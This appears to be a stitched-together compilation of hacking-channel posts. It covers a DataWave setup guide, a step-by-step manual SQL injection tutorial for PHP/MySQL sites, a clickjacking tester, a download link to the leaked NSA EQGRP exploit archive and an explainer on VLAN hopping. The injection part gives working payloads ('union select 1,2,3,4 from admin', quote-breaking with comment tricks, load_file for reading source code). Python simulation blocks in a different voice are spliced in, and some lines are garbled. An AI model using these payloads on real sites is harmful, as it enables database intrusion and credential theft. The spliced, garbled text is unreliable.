UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ The first platform that collects and analyzes every new hacking method,
+ AI practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
🦑 Configuration example of proxy server and router, full 6 parts
▁ ▂ ▄ UnDeRCoDe ▄ ▂ ▁

🦑 DATAWAVE BY NSA - ⭐️
> DataWave is an ingest/query framework that leverages Apache Accumulo to provide fast, secure data access.
twitter.com/UndercodenEWS


🦑 FEATURES :

> Data fusion across structured and unstructured datasets

> Construction and analysis of distributed graphs

> Multi-tenant data architectures, with tenants having distinct security requirements and data access patterns

> Fine-grained control over data access, integrated easily with existing user-authorization services and PKI

πŸ¦‘π•ƒπ”Όπ•‹'π•Š π•Šπ•‹π”Έβ„π•‹ :

1) git clone https://github.com/NationalSecurityAgency/datawave.git

2) $ echo "source DW_SOURCE/contrib/datawave-quickstart/bin/env.sh" >> ~/.bashrc # Step 1 (DW_SOURCE is the directory you cloned into)
$ source ~/.bashrc # Step 2
$ allInstall # Step 3
$ datawaveWebStart && datawaveWebTest # Step 4
# Setup is now complete

3) The four commands above complete the entire quickstart installation. However, it's a good idea to at least skim the sections below to get an idea of how the setup works and how to customize it to your own preferences.

4) To keep things simple, DataWave, Hadoop, Accumulo, ZooKeeper and WildFly are all installed under your DW_SOURCE/contrib/datawave-quickstart directory, and all of them are owned by and run as the current user.

🦑 Important: If you currently have any of the above installed locally under any user account, make sure all of them are stopped/disabled before proceeding.

The setup has four steps:
1: Update ~/.bashrc
2: Bootstrap the Environment
3: Install Services
4: Start WildFly & Run Tests

Step 1: Update ~/.bashrc
1.1 Add the Quickstart Environment
This step ensures that your DataWave environment and all its services remain configured correctly across bash sessions.

$ echo "source DW_SOURCE/contrib/datawave-quickstart/bin/env.sh" >> ~/.bashrc
The env.sh script is a wrapper that bootstraps each service in turn by sourcing its respective {servicename}/bootstrap.sh script. These scripts define the supporting bash variables and functions, encapsulating configuration and functionality consistently for all services.

🦑 Override Default Binaries
1) To override the quickstart's default version of a particular binary, override the corresponding DW_*_DIST_URI value as shown below. URIs may be local or remote; local file URIs must be prefixed with file://

$ vi ~/.bashrc
...

export DW_HADOOP_DIST_URI=file:///my/local/binaries/hadoop-x.y.z.tar.gz
export DW_ACCUMULO_DIST_URI=http://some.apache.mirror/accumulo/1.x/accumulo-1.x-bin.tar.gz
export DW_ZOOKEEPER_DIST_URI=http://some.apache.mirror/zookeeper/x.y/zookeeper-x.y.z.tar.gz
export DW_WILDFLY_DIST_URI=file:///my/local/binaries/wildfly-10.x.tar.gz
export DW_MAVEN_DIST_URI=file:///my/local/binaries/apache-maven-x.y.z.tar.gz

2) source DW_SOURCE/contrib/datawave-quickstart/bin/env.sh

# If building the quickstart docker image, you only need the exports; no need to source env.sh
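The quickstart installs whatever the DW_*_DIST_URI values point at and runs it as the current user, so before sourcing env.sh it is worth checking that each override is a supported URI and that a local tarball matches a digest you pinned yourself. The pre-flight check below is an added example and not part of the DataWave project: the variable names are the real quickstart override variables, while the pinned digests, file paths and the sample environment are placeholders you supply.

```python
"""
Pre-flight check for DataWave quickstart DW_*_DIST_URI overrides.
Added example, not DataWave code: the quickstart itself does not verify
what it fetches, so this checks each override before env.sh is sourced.
"""
import hashlib
import os
from urllib.parse import urlparse

# Real quickstart override variables; the digests you pin for them are
# your own (placeholder mapping passed in as `pinned`).
OVERRIDE_VARS = (
    "DW_HADOOP_DIST_URI",
    "DW_ACCUMULO_DIST_URI",
    "DW_ZOOKEEPER_DIST_URI",
    "DW_WILDFLY_DIST_URI",
    "DW_MAVEN_DIST_URI",
)


def classify_uri(uri):
    """Return 'local', 'remote-tls', 'remote-plain' or 'invalid'."""
    p = urlparse(uri)
    if p.scheme == "file":
        # the quickstart requires the file:// prefix for local tarballs
        return "local" if p.path else "invalid"
    if p.scheme == "https":
        return "remote-tls"
    if p.scheme == "http":
        return "remote-plain"      # fetched with no transport integrity
    return "invalid"


def sha256_of(path, chunk=1 << 20):
    """Streamed SHA-256 so multi-hundred-MB tarballs are not read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def check_local_dist(uri, expected_sha256):
    """Verify a file:// distribution exists and matches the pinned digest."""
    if classify_uri(uri) != "local":
        return False, "not a file:// URI"
    path = urlparse(uri).path
    if not os.path.isfile(path):
        return False, "missing: " + path
    actual = sha256_of(path)
    if actual.lower() != expected_sha256.lower():
        return False, "sha256 mismatch: " + actual
    return True, "ok"


def check_environment(env, pinned):
    """
    env: mapping like os.environ; pinned: {var_name: expected sha256 hex}.
    Returns {var: (ok, reason)} for every override that is set.
    """
    report = {}
    for var in OVERRIDE_VARS:
        uri = env.get(var)
        if uri is None:
            continue                        # default binary, not overridden
        kind = classify_uri(uri)
        if kind == "invalid":
            report[var] = (False, "unsupported URI: " + uri)
        elif kind == "remote-plain":
            report[var] = (False, "plain http, no integrity: " + uri)
        elif kind == "remote-tls":
            report[var] = (True, "https (verify the digest after download)")
        elif var in pinned:
            report[var] = check_local_dist(uri, pinned[var])
        else:
            report[var] = (False, "no pinned sha256 for local tarball")
    return report


if __name__ == "__main__":
    for var, (ok, why) in check_environment(os.environ, {}).items():
        print("PASS" if ok else "FAIL", var, why)
```

Run it in the shell where you edited ~/.bashrc, with your own digest mapping in place of the empty dict; a FAIL line is a reason to fix the export before running allInstall.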

▁ ▂ ▄ UnDeRCoDe ▄ ▂ ▁

🦑 Important if you have a website:


A) Determine whether there is an injection point

This is very simple. The most common thing we see is a page of the form index.php?id=2. We know that PHP is usually paired with a MySQL database, and that database must contain a table, say setting_table. When we submit the above address, the program generally handles it like this:

1. Use GET or POST to read the id we submitted (say id=1) and pass this value to a variable $id.

2. Query: select * from setting_table where id = $id

That is the query statement; substituting $id = 1 gives:

select * from setting_table where id = 1

🦑 There is no problem with this statement: the row with id 1 is fetched and displayed to us, so we see the normal page.

Now let's see how we judge:

1. We submit id=1 and 1=1

Let's see what effect this has. $id here is "1 and 1=1", so the statement becomes:

select * from setting_table where id = 1 and 1 = 1

This adds an AND condition, and 1=1 is always true, so it does not change the result: the row with id=1 is still returned and we see the original, normal page.

2. We submit id=1 and 1=2

Let's look at this one. $id here is "1 and 1=2":

select * from setting_table where id = 1 and 1 = 2

The first part is the same as before, but the 1=2 at the end is never true, and because it is joined with AND the whole condition can never match. No row is found, so the page returns an error or a blank page.

That is the basic reason we generally use and 1=1 / and 1=2 to judge an injection point. A few things to note:

1. The program must build the query as where id = $id rather than where id = '$id'. The single quotes make a big difference; I will talk about that later.

2. The program did not process (or did not properly process) the parameters we submitted, so our input goes straight into the query. If the program filters the submitted parameters, things are different; more on that later!
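The and 1=1 / and 1=2 test above, run offline as an added example (not code from the original post): a PHP-style handler that pastes $id straight into the query is emulated in Python with sqlite3, next to the same handler with a bound parameter, which is the fix. setting_table and its two rows are constructed sample data.

```python
"""
Boolean-based injection check, added example (not from the original post).
A PHP-style page handler is simulated with sqlite3 so the
"and 1=1" / "and 1=2" differential can be run offline.
"""
import sqlite3

# Constructed sample data standing in for setting_table.
db = sqlite3.connect(":memory:")
db.execute("create table setting_table (id integer, title text)")
db.executemany("insert into setting_table values (?, ?)",
               [(1, "first"), (2, "second")])


def vulnerable_page(id_param):
    """Emulates `select * from setting_table where id = $id` with $id
    pasted in unquoted and unfiltered. Returns the rows, or the string
    "error" when the SQL fails (the error/blank page in the post)."""
    sql = "select * from setting_table where id = " + id_param
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error:
        return "error"


def safe_page(id_param):
    """Same query with a bound parameter: the input is data, never SQL."""
    return db.execute(
        "select * from setting_table where id = ?", (id_param,)
    ).fetchall()


def is_injectable(page, id_value="1"):
    """The post's test: the page for `id=1 and 1=1` must equal the normal
    page, and the page for `id=1 and 1=2` must differ from it."""
    normal = page(id_value)
    true_case = page(id_value + " and 1=1")
    false_case = page(id_value + " and 1=2")
    return normal == true_case and normal != false_case


if __name__ == "__main__":
    print("vulnerable handler injectable:", is_injectable(vulnerable_page))
    print("parameterized handler injectable:", is_injectable(safe_page))
```

With the bound parameter, sqlite3 compares the whole string "1 and 1=1" against the integer column, so both probes return nothing and there is no differential to observe; the same holds for MySQL prepared statements in PHP (mysqli or PDO).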
▁ ▂ ▄ UnDeRCoDe ▄ ▂ ▁

🦑 Important if you have a website, part 2:

Quickly determine the MySQL version

Premise: you have found an injection point, for example news.php?id=1

That is, submitting and 1=1 and and 1=2 gives different results.

We can guess the MySQL version like this:

1. Submit /news.php?id=1/*!40000%20s*/. If the page returns normally, the MySQL version is below 4.00.00 (the five digits are the version number with the dots removed). Then lower the number step by step: try 39000, and if that is still normal, 38000, and so on, until the page returns an error; then refine the lower digits in the same way. The largest number that still produces an error is the MySQL version (the next step up returns normally).

Here is the sequence from my test ((+) = page normal, (-) = error):

40000 (+) - 39000 (+) - 38000 (+) - 37000 (-) - 37900 (+) - 37800 (+) - 37700 (-) - End!!

So the MySQL version is 37700, i.e. 3.77.

2. In general we don't guess the exact version; we only care whether MySQL is 4.0 or above, because only MySQL 4.0 and later support UNION queries. So we usually just submit /*!40000%20s*/: an error means version 4.0 or higher, a normal page means an older version.

PS: in /*!40000%20s*/, the /*!...*/ is MySQL's special conditional comment: its content is executed only when the server version is at least the number given, so the stray "s" causes a syntax error only on 4.0.0 and above. Nothing strange about it, just remember how to use it.
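The conditional-comment oracle above, carried a step further as an added example (not from the original post): a constructed stand-in for the database implements only the rule the trick relies on (the body of /*!NNNNN ... */ runs only when the server version is at least NNNNN), and the probe loop replaces the post's digit-by-digit guessing with a binary search over the same yes/no oracle. FakeMySQL, the query text and the version numbers are all assumptions for the demo.

```python
"""
Version probing with MySQL conditional comments, added example that is not
part of the original post. FakeMySQL is a constructed stand-in that models
only how /*!NNNNN ... */ is handled; nothing else about MySQL is emulated.
"""
import re

COND_COMMENT = re.compile(r"/\*!(\d{5})\s*(.*?)\*/", re.S)


class FakeMySQL:
    """Constructed stand-in for the remote database (assumption)."""

    def __init__(self, version):          # e.g. 37700 means 3.77.00
        self.version = version

    def query(self, sql):
        """True for a 'normal page', False for an SQL error."""
        for m in COND_COMMENT.finditer(sql):
            if self.version >= int(m.group(1)) and m.group(2).strip():
                # body becomes part of the statement; a bare token like
                # "s" after "id = 1" is a syntax error on a real server
                return False
        return True


def page_is_normal(server, version_guess):
    """The post's probe: /news.php?id=1/*!NNNNN s*/ (%20 is the space)."""
    sql = "select * from news where id = 1/*!%05d s*/" % version_guess
    return server.query(sql)


def supports_union(server):
    """UNION arrived in MySQL 4.0, so an error on /*!40000 s*/ means >= 4.0."""
    return not page_is_normal(server, 40000)


def find_version(server, lo=30000, hi=99999):
    """Binary search for the largest NNNNN that still errors, which is the
    server version to the precision of the five-digit number.
    Invariant: lo errors (version >= lo), hi is normal (version < hi)."""
    if page_is_normal(server, lo):
        return None                        # older than the search window
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if page_is_normal(server, mid):
            hi = mid
        else:
            lo = mid
    return lo


if __name__ == "__main__":
    srv = FakeMySQL(37700)
    print("union:", supports_union(srv), "version:", find_version(srv))
```

Against a real target each page_is_normal call is one HTTP request, so the binary search needs about 17 requests for the whole five-digit range instead of up to nine per digit.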

Lecture 3: How to get the table name in a PHP injection.

I was about to write this anyway, then saw someone ask, so let me sum it up; call it the third lecture!

Quote:
Originally posted by spirit at 2006-5-16 05:57 PM:

I have read a lot of articles ... my eyes are all blurry.

The things involved are quite comprehensive,

But I still don't know how to get the table.

You can't go directly to the field, can you?

Go one by one:

database, table, field, values ...

I think this logic is correct ...

By the way, I still feel ...

Tables really are not easy to get. Unlike ASP, where an error message may expose the table name directly, with PHP this is usually not available. We generally have two methods:

1. Guess by experience: for example admin, user, news, vote, wenzhang, guanliyuan and other names everyone commonly uses; there is no other way.

2. Read the source code: use load_file() to dump the file's code, and you can see exactly which table and which fields the data is inserted into. This is very clear, but load_file also takes some skill; I will talk about it later.

🦑 To be specific:

1. Nothing much to say about this one, just guess directly. For example, given an injection point like news.php?id=1, first find the number of columns with a UNION query, e.g. news.php?id=1 and 1=2 union select 1,2,3,4 succeeds,

then guess like this: news.php?id=1 and 1=2 union select 1,2,3,4 from admin/*. If there is an admin table it returns normally; otherwise there is no table named admin. The same goes for other table names.

2. This one is the ultimate method. For example, if you get the absolute path, you can load_file(file path) to read the file's code. If you read the administrator's login page this way, you can see the SQL statement in it and which table it reads its values from, right?

That is the principle. Think it over, and I hope you share what you learn.

🦑 The difference the quotation marks make

Many friends do not understand the role of the quotes and think that adding them is the same as not adding them.

Quotation marks (both single and double) have a great influence on our injection. What matters here is the state of magic_quotes_gpc: when magic quotes are off they have no effect; when they are on things are very different.

Tips: when magic quotes are on, the single quote ('), double quote ("), backslash (\) and NUL byte in everything we submit are automatically prefixed with the escape character \, so they become \', \", \\ and so on. This is very troublesome for injection. Examples follow.

1. The first example (without quotes)

If the statement is as follows:

QUOTE:
select * from news where newsid = $id

1. When magic quotes are off

When they are off, the data we submit is not processed at all. Given the SQL statement above,

we can submit the value of $id in the URL, as we said before, to give $id:

$id = 1 union select 1,2,3,4 from admin
and we basically get the data we want.

2. When magic quotes are on

There is no difference this time, because we did not submit any sensitive characters.

Second, the second example; look at the SQL statement it uses:

QUOTE:
select * from news where newsid = '$id'


This time, to successfully use the unfiltered parameter $id, we submit:

$id = 1' union select 1,2,3,4 from admin/*

There must be a single quote (') to close the one in front, and then a /* to comment out the rest.

1. When magic quotes are off

If magic quotes are off we can submit this directly and use it successfully.

2. When magic quotes are on

If magic quotes are on, the statement we submitted becomes:

$id = 1\' union select 1,2,3,4 from admin/*

Look, there is no way to use it (although the hole is still there).
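The four cases above (unquoted vs quoted context, magic quotes off vs on), together with the "union select 1,2,3,4 from admin" table guess from Lecture 3, run as one added example that is not code from the original post. The two handlers are emulated in Python with sqlite3 on constructed news and admin tables. One assumption to note: SQLite has no backslash escapes, so the magic-quotes emulation doubles the quote ('') instead of emitting PHP's \'; the effect on the query is the same, the submitted quote can no longer close the string literal.

```python
"""
Quoted vs unquoted injection context under magic_quotes, added example
(not the original post's code). magic_quotes_gpc is emulated with SQLite's
quote doubling, which plays the role PHP's backslash escape plays on MySQL.
"""
import sqlite3

db = sqlite3.connect(":memory:")
# Constructed sample schema: both tables have four columns so the
# "union select 1,2,3,4" payload from the post lines up.
db.executescript("""
create table news  (newsid integer, title text, body text, author text);
create table admin (id integer, username text, password text, email text);
insert into news  values (1, 'hello', 'world', 'editor');
insert into admin values (1, 'root', 'hunter2', 'root@example.test');
""")


def magic_quotes_gpc(value):
    """What magic_quotes_gpc does to every GET/POST value when it is on.
    PHP emits \\' for MySQL; SQLite's equivalent is the doubled quote ''.
    Either way the quote stays inside the string literal."""
    return value.replace("'", "''")


def run(sql):
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error:
        return "error"


def unquoted_page(id_param, magic_quotes):
    """select * from news where newsid = $id   (no quotes around $id)."""
    if magic_quotes:
        id_param = magic_quotes_gpc(id_param)
    return run("select * from news where newsid = " + id_param)


def quoted_page(id_param, magic_quotes):
    """select * from news where newsid = '$id'   (quoted)."""
    if magic_quotes:
        id_param = magic_quotes_gpc(id_param)
    return run("select * from news where newsid = '" + id_param + "'")


def union_worked(result):
    """The post's oracle: the UNION added a row, so table admin exists."""
    return result != "error" and len(result) > 1


UNQUOTED_PAYLOAD = "1 union select 1,2,3,4 from admin"
QUOTED_PAYLOAD = "1' union select 1,2,3,4 from admin/*"


def outcomes():
    """The post's four cases: (context, magic_quotes) -> exploited?"""
    return {
        ("unquoted", "off"): union_worked(unquoted_page(UNQUOTED_PAYLOAD, False)),
        ("unquoted", "on"):  union_worked(unquoted_page(UNQUOTED_PAYLOAD, True)),
        ("quoted", "off"):   union_worked(quoted_page(QUOTED_PAYLOAD, False)),
        ("quoted", "on"):    union_worked(quoted_page(QUOTED_PAYLOAD, True)),
    }


if __name__ == "__main__":
    for case, hit in outcomes().items():
        print(case, "exploited" if hit else "blocked")
```

Only the quoted context with magic quotes on comes out blocked; the numeric context is exploited either way because the payload never needs a quote, which is why escaping is not a fix and bound parameters are.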


WRITTEN BY UNDERCODE
▁ ▂ ▄ UnDeRCoDe ▄ ▂ ▁
🦑 FOLLOW THIS GUIDE IF YOU HAVE A WEBSITE!
▁ ▂ ▄ UnDeRCoDe ▄ ▂ ▁

🦑 2020 Instagram topic
> Free Instagram scripts, bots and Python API wrapper. Get free instagram followers with our auto like, auto follow and other scripts!
t.me/UndercodeTesting

πŸ¦‘π•ƒπ”Όπ•‹'π•Š π•Šπ•‹π”Έβ„π•‹ :

1) git clone https://github.com/instagrambot/instabot.git

2) cd instabot

3) pip install -U instabot


🦑 You will NOT run the code provided in this repo

> You will NOT use this API for marketing purposes (spam, botting, harassment, massive bulk messaging...).

> We do NOT give support to anyone who wants to use this API to send spam or commit other crimes.

✅ Verified by Undercode as topic: Instagram bot tools

▁ ▂ ▄ UnDeRCoDe ▄ ▂ ▁

🦑 2020 Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems
t.me/UndercodeTesting

πŸ¦‘π•ƒπ”Όπ•‹'π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Clone or download the project files (no compilation or installation is required):

git clone https://github.com/CISOfy/lynis
Execute:

2) cd lynis; ./lynis audit system

> If you want to run the software as root, we suggest changing the ownership of the files. Use chown -R 0:0 to recursively alter the owner and group and set it to user ID 0 (root).

🦑 INTENDED USERS :

System administrators
Auditors
Security officers
Penetration testers
Security professionals

🦑 USE CASES :

Automated security auditing
Compliance testing (e.g. ISO27001, PCI-DSS, HIPAA)
Vulnerability detection

✅ VERIFIED

▁ ▂ ▄ UnDeRCoDe ▄ ▂ ▁

🦑 How to check whether a website is vulnerable to clickjacking
> and create a PoC (Termux / Linux)
t.me/UndercodeTesting

πŸ¦‘π•ƒπ”Όπ•‹'π•Š π•Šπ•‹π”Έβ„π•‹ :

1) git clone https://github.com/D4Vinci/Clickjacking-Tester.git

2) cd Clickjacking-Tester

3) python clickjacking_tester.py <file_name> (use python3 if that is your interpreter)

4) Example input:

$ python clickjacking_tester.py sites.txt

where sites.txt contains:
www.google.com
www.turkhackteam.com

5) Output:
[*] Checking www.google.com
[-] Website is not vulnerable!
[*] Checking www.turkhackteam.org
[+] Website is vulnerable!
[*] Created a poc and saved to <URL>.html
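What the tool decides on is the framing headers of the response, so here is the check and PoC generation written out as an added example; it is not the Clickjacking-Tester project's code. A page can be framed unless X-Frame-Options or a Content-Security-Policy frame-ancestors directive forbids it, and when frame-ancestors is present browsers ignore X-Frame-Options. The SAMPLES header sets are constructed, not captured from the sites in the post; check_url is the only part that touches the network.

```python
"""
Clickjacking header check and PoC generator, added example (not the
Clickjacking-Tester project's code). Sample header sets are constructed.
"""
import html
import urllib.request


def frame_protection(headers):
    """headers: dict of response headers (names compared case-insensitively).
    Returns (vulnerable: bool, reason: str)."""
    h = {k.lower(): v for k, v in headers.items()}

    # CSP frame-ancestors overrides X-Frame-Options in browsers that
    # support it (CSP Level 2), so it is checked first.
    csp = h.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.lower() for s in parts[1:]]
            if not sources or "*" in sources:
                return True, "frame-ancestors allows any origin"
            return False, "frame-ancestors " + " ".join(sources)

    xfo = h.get("x-frame-options", "").strip().lower()
    if xfo in ("deny", "sameorigin"):
        return False, "X-Frame-Options: " + xfo.upper()
    if xfo.startswith("allow-from"):
        # obsolete value; modern browsers ignore the header entirely
        return True, "X-Frame-Options ALLOW-FROM is not honoured by modern browsers"
    if xfo:
        return True, "unrecognised X-Frame-Options value: " + xfo
    return True, "no framing protection header"


def build_poc(url):
    """Minimal PoC page: the target loaded in an iframe, which is what a
    clickjacking page would overlay with its own UI."""
    safe = html.escape(url, quote=True)
    return (
        "<!DOCTYPE html><html><head><title>Clickjacking PoC</title></head>"
        "<body><h1>Clickjacking test for " + safe + "</h1>"
        '<iframe src="' + safe + '" width="800" height="600"></iframe>'
        "</body></html>"
    )


def check_url(url, timeout=10):
    """Live check (network): fetch the URL and apply frame_protection."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return frame_protection(dict(resp.headers.items()))


# Constructed sample responses standing in for real sites.
SAMPLES = {
    "protected-xfo": {"X-Frame-Options": "SAMEORIGIN"},
    "protected-csp": {"Content-Security-Policy":
                      "default-src 'self'; frame-ancestors 'none'"},
    "vulnerable-none": {"Content-Type": "text/html"},
    "vulnerable-allowfrom": {"X-Frame-Options": "ALLOW-FROM https://a.example"},
    "csp-wins": {"X-Frame-Options": "DENY",
                 "Content-Security-Policy": "frame-ancestors *"},
}

if __name__ == "__main__":
    for name, hdrs in SAMPLES.items():
        vulnerable, why = frame_protection(hdrs)
        print("[+]" if vulnerable else "[-]", name, why)
```

The csp-wins sample is the case worth remembering when reviewing a fix: adding X-Frame-Options: DENY does nothing if a permissive frame-ancestors directive is already being sent.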

✅ verified
▁ ▂ ▄ UnDeRCoDe ▄ ▂ ▁

🦑 NSA leak tool
> Decrypted content of odd.tar.xz.gpg, swift.tar.xz.gpg and windows.tar.xz.gpg
t.me/UndercodeTesting

πŸ¦‘π•ƒπ”Όπ•‹'π•Š π•Šπ•‹π”Έβ„π•‹ :

🦑 sha256 hashes

> Original archives
7c19a67d728bc700d18d2ed389a80de495681b7097222d9b8f1d696f0986f9a2 odd.tar.xz.gpg
78b89b2c4b129400150c7b60a426ff469aaea31da1588d2abc4180feaa9c41d3 swift.tar.xz.gpg
c28d5c10ec78bc66d3868e4862c7f801ffd561e2116b529e0782bf78f3ef3255 windows.tar.xz.gpg


> Decrypted archives
85e03866ae7eaaedd9462054b62a10f2180983bdfd086b29631173ae4422f524 odd.tar.xz
df468f01e65f3f1bc18f844d7f7bac8f8eec3664a131e2fb67ae3a55f8523004 swift.tar.xz
5bb9ddfbcefb75d017a9e745b83729390617b16f4079356579ef00e5e6b5fbd0 windows.tar.xz

🦑 1) DOWNLOAD: https://github.com/x0rz/EQGRP_Lost_in_Translation


> 3 folders:

windows: contains Windows exploits, implants and payloads

swift: contains operational notes from banking attacks

oddjob: docs related to the ODDJOB backdoor

▁ ▂ ▄ UnDeRCoDe ▄ ▂ ▁

🦑 Comprehensive analysis of VLAN attacks


1) VLAN attacks are the methods hackers use against networks built on VLAN technology. Faced with these constantly refurbished tricks, how do we take effective preventive measures? In this article we introduce the hacker's attack methods against VLAN-managed networks and the defensive measures we can take.


🦑 The common VLAN attacks are as follows:

1) VLAN attack 1: 802.1Q and ISL tag attacks

A tag attack is a malicious attack that lets users on one VLAN illegally access another VLAN. For example, if a switch port is configured with DTP (Dynamic Trunking Protocol) in auto mode and receives forged DTP packets, it becomes a trunk port and may then receive traffic for any VLAN. A malicious user can thus communicate with other VLANs through the port he controls. Sometimes, even when only ordinary packets are received, a switch port may behave against its intended configuration and operate like a full trunk port (for example, accepting packets from VLANs other than its own). This phenomenon is often called "VLAN leakage".

> Against this kind of attack, simply set DTP to Off on all untrusted ports (ports that do not meet the trust condition). The software and hardware of the Cisco Catalyst 2950, Catalyst 3550, Catalyst 4000 and Catalyst 6000 series switches can also implement proper traffic classification and isolation on all ports.

2) VLAN attack 2: double-encapsulated 802.1Q / nested VLAN attack

Inside the switch, VLAN numbers and identifiers are represented in a special extended format, so that the forwarding path stays independent of the end-to-end VLAN without losing any information. Outside the switch, the tagging rules are specified by standards such as ISL or 802.1Q.

> ISL is Cisco proprietary technology and is a compact form of the extended packet header used inside the device. Every packet always carries a tag and there is no risk of losing the identifier, which improves security.

> On the other hand, the IEEE committee that developed 802.1Q decided that for backward compatibility it was best to support a native VLAN, that is, a VLAN that is not explicitly associated with any tag on the 802.1Q link. This VLAN is used implicitly to receive all untagged traffic on an 802.1Q port.

> This feature is what users want, because it lets an 802.1Q port talk directly to an old 802.3 port by sending and receiving untagged traffic. In all other cases, however, it can be very harmful, because packets belonging to the native VLAN lose their tag when sent over an 802.1Q link, and with it information such as their class of service (802.1p bits).

Attack flow: the attacker sends a double-tagged 802.1Q frame (outer tag VLAN A, inner tag VLAN B) into a port on VLAN A. The first switch strips the outer tag, because VLAN A is the native VLAN of the trunk, and forwards the frame over the trunk still carrying the VLAN B tag; the next switch delivers it into VLAN B.

Note: this only works when the trunk's native VLAN is the same as the attacker's VLAN.

3) When double-encapsulated 802.1Q packets enter the network from a device on the same VLAN as the native VLAN of the trunk, their VLAN IDs are not preserved end-to-end, because the 802.1Q trunk always modifies the packet by stripping off its outer tag. Once the outer tag is removed, the inner tag becomes the packet's only VLAN identifier. So if a packet is double-encapsulated with two different tags, traffic can hop between VLANs.

4) This situation should be treated as a misconfiguration, because the 802.1Q standard does not force users to use the native VLAN in these situations. The proper configuration is to always clear the native VLAN from all 802.1Q trunks (setting 802.1Q all-tagged mode achieves exactly the same effect). Where the native VLAN cannot be cleared, choose an unused VLAN as the native VLAN of all trunks and never use it for any other purpose. Protocols such as STP, DTP and UDLD should be the only legitimate users of the native VLAN, and their traffic should be completely isolated from all data packets.
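The double-tagging path above, worked through on raw bytes as an added example that is not part of the original article. Frames with stacked 802.1Q tags are built and parsed, and the two switch hops are modelled only as far as needed to show the three outcomes the text describes: the hop succeeds when the attacker's VLAN is the trunk's native VLAN, fails when the native VLAN is an unused one, and fails when native-VLAN traffic is tagged (the all-tagged mode). MAC addresses, VLAN numbers and the simplified port behaviour are assumptions for the demo.

```python
"""
Double-tagged 802.1Q frame walkthrough, added example (not from the
original article). Two switch hops are modelled just enough to show when
the attack works. Addresses and VLAN numbers are constructed.
"""
import struct

ETH_P_8021Q = 0x8100
ETH_P_IP = 0x0800

ATTACKER_MAC = bytes.fromhex("020000000001")   # constructed
VICTIM_MAC = bytes.fromhex("020000000002")     # constructed


def dot1q_tag(vid, pcp=0):
    """TPID 0x8100 followed by the TCI: PCP (3 bits), DEI (1), VID (12)."""
    return struct.pack("!HH", ETH_P_8021Q, (pcp << 13) | (vid & 0x0FFF))


def build_frame(dst, src, vids, payload, ethertype=ETH_P_IP):
    """Ethernet frame with zero or more stacked 802.1Q tags, outer first."""
    tags = b"".join(dot1q_tag(v) for v in vids)
    return dst + src + tags + struct.pack("!H", ethertype) + payload


def parse_tags(frame):
    """Return (VIDs outer->inner, inner ethertype, payload)."""
    pos, vids = 12, []
    while struct.unpack_from("!H", frame, pos)[0] == ETH_P_8021Q:
        tci = struct.unpack_from("!H", frame, pos + 2)[0]
        vids.append(tci & 0x0FFF)
        pos += 4
    return vids, struct.unpack_from("!H", frame, pos)[0], frame[pos + 2:]


def strip_outer_tag(frame):
    return frame[:12] + frame[16:]


def access_ingress(frame, access_vlan):
    """Attacker's access port on switch 1 (simplified model). A tag that
    matches the port's VLAN is accepted and removed; a tag for any other
    VLAN is dropped. Whatever follows, here the second 802.1Q header, is
    just payload as far as the switch is concerned."""
    vids, _, _ = parse_tags(frame)
    if not vids:
        return access_vlan, frame
    if vids[0] != access_vlan:
        return None, None
    return access_vlan, strip_outer_tag(frame)


def trunk_egress(frame, vlan, native_vlan, tag_native=False):
    """Switch 1 sends the frame over the 802.1Q trunk. Native-VLAN traffic
    leaves untagged unless the native VLAN is tagged (all-tagged mode);
    everything else gets its VLAN tag prepended."""
    if vlan == native_vlan and not tag_native:
        return frame
    return frame[:12] + dot1q_tag(vlan) + frame[12:]


def trunk_ingress(frame, native_vlan):
    """Switch 2 receives on its trunk: a tagged frame belongs to the VLAN
    in its first tag, an untagged one to the native VLAN."""
    vids, _, _ = parse_tags(frame)
    if vids:
        return vids[0], strip_outer_tag(frame)
    return native_vlan, frame


def deliver(frame, access_vlan, native_vlan, tag_native=False):
    """Full path attacker -> switch 1 -> trunk -> switch 2.
    Returns the VLAN the frame is delivered into, or None if dropped."""
    vlan, f = access_ingress(frame, access_vlan)
    if f is None:
        return None
    f = trunk_egress(f, vlan, native_vlan, tag_native)
    vlan, _ = trunk_ingress(f, native_vlan)
    return vlan


if __name__ == "__main__":
    hop = build_frame(VICTIM_MAC, ATTACKER_MAC, [10, 20], b"ping")
    print("native=10:", deliver(hop, 10, 10))               # 20: hopped
    print("native=99:", deliver(hop, 10, 99))               # 10: contained
    print("native=10, tagged:", deliver(hop, 10, 10, True))  # 10: contained
```

The model maps onto the article's advice as follows (standard Cisco IOS commands, my mapping rather than the article's): native_vlan set to an unused VLAN is `switchport trunk native vlan <unused>` on each trunk, tag_native=True is the global `vlan dot1q tag native`, and the DTP attacks further down are closed by `switchport mode access` plus `switchport nonegotiate` on every user-facing port.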

5) VLAN attack 3: VLAN hopping attack

A virtual LAN (VLAN) is a way of segmenting a broadcast domain. VLANs are also often used to add security to a network, because a computer on one VLAN cannot talk to hosts on another VLAN without explicit access. However, a VLAN by itself is not enough to secure the environment: a malicious hacker can jump from one VLAN to another without being authorized.

6) VLAN hopping relies on the Dynamic Trunking Protocol (DTP). When two switches are interconnected, DTP lets them negotiate whether the link between them becomes an 802.1Q trunk. The negotiation is done by checking the configuration state of the ports.

7) The VLAN hopping attack makes full use of DTP. The hacker's computer impersonates another switch and sends a forged DTP negotiation message announcing that it wants to become a trunk; the real switch receives this DTP message and believes it should enable 802.1Q trunking, and once trunking is enabled, the traffic of all VLANs is sent to the hacker's computer.

8) After the trunk is established, the hacker can continue to sniff the traffic, or choose the VLAN his attack traffic is sent into by adding an 802.1Q tag to the frames.

9) VLAN attack 4: VTP attack

